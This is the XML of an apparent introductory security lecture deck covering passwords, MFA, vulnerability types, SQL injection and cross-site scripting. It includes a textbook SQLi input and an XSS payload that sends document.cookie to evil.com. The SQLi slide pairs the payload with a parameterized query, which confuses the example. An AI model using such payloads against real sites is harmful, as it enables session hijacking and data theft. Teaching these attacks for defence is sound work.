            <a:off x="381000" y="1733550"/>
            <a:ext cx="7553068" cy="2892742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Create long, complex passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Passwords should be at least 10 characters in length. They should also contain a combination of upper and lowercase letters, numbers, and special characters.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Deploy multi-factor authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Multi-factor authentication (MFA) is a security process that requires users to respond to requests to verify their identities before they can access networks or other online applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Use biometric passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Instead of having users store or remember complex passwords, biometric passwords provide physical proof of identities using devices that scan attributes such as fingerprints, faces, and voices.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{5605EAD4-7542-426B-9835-F30FCF724F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08EB51-1B8F-4C1B-ACC7-8CFDE245C694}"/>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0B0A9E35-B023-4631-A192-25C032073391}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{6F2CFA44-715A-4948-B083-B59B3BAC9DD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0C5D59C-A005-4106-A587-816F809C51DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="253946"/>
            <a:ext cx="3958228"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dirty="0"/>
              <a:t>5. password protection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 4">
            <a:extLst>
              <a:ext uri="{AD75630E-7EA6-4CF9-B60D-A950FB8C07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26DA23-3D84-46F0-9A95-B62BC7644A89}"/>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E36DA3FD-4D09-452F-958E-510E8A74EF3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17A19B6E-4DEE-4BE4-A088-0C80D1E7CE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69275C3-96EF-4B83-88EE-1EE242FBD0D6}"/>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Vulnerability in Information security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{C57090CB-2413-4AE8-8E21-BF5DBECFDA9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70F4DE-F3FA-4177-BCBB-659DCEB43FC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1733550"/>
            <a:ext cx="7553068" cy="2892742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Vulnerabilities are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>weaknesses in a system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>that give threats the opportunity to compromise an individual's or an organisation's assets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Type of Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Hardware Vulnerability: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Weaknesses or flaws in physical devices (like computers or routers) that hackers can exploit to gain unauthorized access or cause damage.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Software Vulnerability: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Flaws or bugs in software (such as apps or operating systems) that can be used by hackers to compromise the system, often due to coding mistakes or outdated software.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Network Vulnerability: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>A network vulnerability is a weakness or flaw in the design, implementation, or configuration of a computer network that attackers can exploit to gain unauthorized access, steal data, or disrupt services.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Procedural Vulnerability: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Weaknesses in the processes or rules organizations follow, like using default passwords or failing to monitor activities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:latin typeface="Nunito"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{E1AB4A53-5593-4308-9F11-988EC959AB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FD603F-CF8E-4936-9511-A1F83C1E2D3E}"/>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ACFBE2BE-1486-4780-9D39-37C6D573DF43}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{A0A1C5C5-F3C1-4059-B23D-E93DF3EDECE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897E7CE-B5DB-4ABA-B083-141AD0D9758E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="253946"/>
            <a:ext cx="4953000"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dirty="0"/>
              <a:t>6. Vulnerability exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 4">
            <a:extLst>
              <a:ext uri="{22476261-8B5A-415B-9942-C02E6A9ED9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73D9E9-C440-4566-B985-AD40DAC4AE91}"/>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8EB6EA11-35F0-4D11-B286-EF5040F5D26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958A41F0-D89E-4859-920D-C6AE9D3C6EF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C2E1E45-6BDB-4840-89D5-7D9F2612D25F}"/>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Exploit of a vulnerability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{3A3534C6-44A2-4F91-886F-D7EBA994B9C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3287855-6A60-40A1-B5DF-B8DCFCC22E0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1733550"/>
            <a:ext cx="7553068" cy="2892742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Google Sans"/>
              </a:rPr>
              <a:t>Exploiting vulnerabilities involves taking advantage of weaknesses in software, hardware, or configuration to gain unauthorized access, execute arbitrary code, or perform malicious actions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Google Sans"/>
              </a:rPr>
              <a:t>Vulnerability Exploitation refers to the act of taking advantage of weaknesses or security flaws in a system, application, or network to gain unauthorized access, steal data, or disrupt operations. This exploitation can be carried out through various means, such as injecting malicious code, exploiting misconfigured settings, or leveraging software vulnerabilities. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Google Sans"/>
              </a:rPr>
              <a:t>The goal of vulnerability exploitation is typically to compromise the confidentiality, integrity, or availability of information and resources within the targeted system or network. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Google Sans"/>
              </a:rPr>
              <a:t>Cyber attackers often exploit vulnerabilities to execute cyber-attacks, such as malware infections, data breaches, or denial-of-service attacks.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{DE9AA231-D589-46C0-A31D-A2DF16571A8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67AA21-E591-4838-BA50-92F2C488FA8C}"/>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39B98937-3AE9-43C1-9490-2EDEC0459542}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{C2CA39CC-60BE-4498-81D2-54C3CCFA28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73E4AD-804E-45A1-BF4C-458BE3209826}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="253946"/>
            <a:ext cx="4876800"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dirty="0"/>
              <a:t>6. Vulnerability exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 4">
            <a:extLst>
              <a:ext uri="{B9F94853-BCA0-403A-8326-8708993F0A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8F9D54-CCBF-48D9-9431-E631956321E4}"/>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975C2EBE-40B3-4047-974E-23D40A0B5DA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47B2559F-A63C-4A13-9A82-2053B5F1306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74C7917-1862-4313-9169-CECE61C8C61C}"/>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SQL Injection (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{9AFEAA27-22B9-40D5-B44F-D1F0589E00E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B0F0A9-B877-4DA0-A4E4-E580226D7A62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1733550"/>
            <a:ext cx="7553068" cy="2892742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>SQL Injection remains a highly exploited vulnerability, allowing attackers to manipulate backend databases by injecting malicious SQL statements through input fields.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>This can lead to data theft, privilege escalation, or system control.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>E.g.,  In the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>MOVEit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> Transfer breach (May 2023), attackers exploited a zero-day </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> flaw to install a custom web shell and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>exfiltrate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> organizational data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>PreparedStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>stmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>conn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>prepareStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>"SELECT * FROM users WHERE email = ?"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>stmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>setString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DE935F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>userInput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>userInput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> isn’t sanitized, attackers could input:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>' OR '1'='1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0">
              <a:latin typeface="fkGroteskNeue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{9B9D3E0A-7308-4996-9320-5DBF2297DFF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CDD89E-90F7-4AE1-BA3D-3AE35BC6FC30}"/>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D3BABE1E-0B03-475A-BF18-8B6883E78708}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{BCAE9C46-9F7C-4CD2-898B-07755BD00F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3886A0-5770-40C0-9F8C-1C54BE55C2A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="253946"/>
            <a:ext cx="4876800"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dirty="0"/>
              <a:t>6. Vulnerability exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 4">
            <a:extLst>
              <a:ext uri="{546E63C9-B0EA-4511-BE40-C49BDF601D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2C75E9-DD24-41F6-A844-84AF20BD39A9}"/>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BAD424E0-33AB-471C-AB93-53A46DF6A7A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F1CA4905-682B-4C19-9186-EA5F262185C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07F1C9-E98F-4E4D-BE1E-50DDF8FE8C46}"/>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Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{E11A163C-1DB3-45A9-BFFF-E9402CE7B03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84A471C-4D94-4FE0-BE53-1511B1BA6E1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1733550"/>
            <a:ext cx="7553068" cy="2892742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>XSS vulnerabilities occur when untrusted data is injected into web pages without proper sanitization, enabling attackers to run arbitrary JavaScript in users' browsers. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>In early 2025, attackers exploited an XSS flaw in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Krpano</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> framework, injecting scripts into hundreds of websites, redirecting users, and spamming search results.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>&lt;script&gt;document.location='http://evil.com/steal?cookie='+document.cookie&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
